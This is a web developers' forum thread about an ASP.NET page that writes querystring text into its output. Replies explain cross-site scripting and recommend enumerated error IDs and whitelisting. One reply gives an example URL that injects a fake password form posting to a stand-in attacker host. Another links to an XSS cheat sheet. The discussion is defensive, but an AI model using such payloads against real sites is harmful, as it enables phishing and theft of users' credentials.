Opinions on writing QueryString to page

kkbigal

kkbigal

kkbigal

Associate
Joined
24 Jul 2003
Posts
1,420
Location
West Mids
This isn't actually a problem as such, just wondering what people think about this :)

I've just come across a commercial ASP.NET system we're using and it defaulted me to a page where it told me I wasn't authorised to view the page, but it had written this message as a querystring and then presumably Response.Write to page. Sure enough, I changed the querystring and the page displayed exactly what I'd typed, even down to displaying an input box on the page.

Just wondering if you feel it's bad practice to allow a user to manipulate page content like this? I know it's something I've always tried to avoid when doing sites.
 
Yes, very bad practice, and leaves a huge gaping security hole. If, say, the domain name was of a "trusted" site.. I could dupe users to send their details to my site, by getting them to click and complete:
Code: 
http://blah/page.htmx?body=%3Cform+action3D%22http%3A%2F2Fimg0nn4h4cky0u5uck4%2Fl33t0r.php%22%3E3Cp%3EEnter+you+secret+squirrell+password%3C%2Fp%3E%3Cinput+type3D%22text%22+name%3D%22lolol%22%3E%3Cbr+%2F%3E3Cinput+type%3D%22submit%22%3E%3C%2Fform%3E
 
Exactly as above.

When I have an error screen I pass an enumerated ID of the error to the page, and then run a select case to get exactly what error message should be displayed.
 
Yeah that's what I thought :)

The worrying this is the developers must have set validateRequest="false" because by default .NET picks up malicious looking stuff in the querystring.
 
This is part of a whole range of security vulnerabilities called Cross Site Scripting (XSS). With it an attacker can, if they know about the system, do such things as steal admin session cookies and gain access to the system.

There's a good XSS cheat sheet full of various different ways of doing it (some that will bypass rudimentary filters) here: http://ha.ckers.org/xss.html

There are third party libraries that will strip this stuff out (or rather, start from a whitelist and only allow "safe" stuff through) but the best way is to avoid echoing a query string like that.

As for setting validateRequest=false, some developers do that site wide if many pages accept rich text (html) as in a content management system.
 
You must log in or register to reply here.
Back
Top Bottom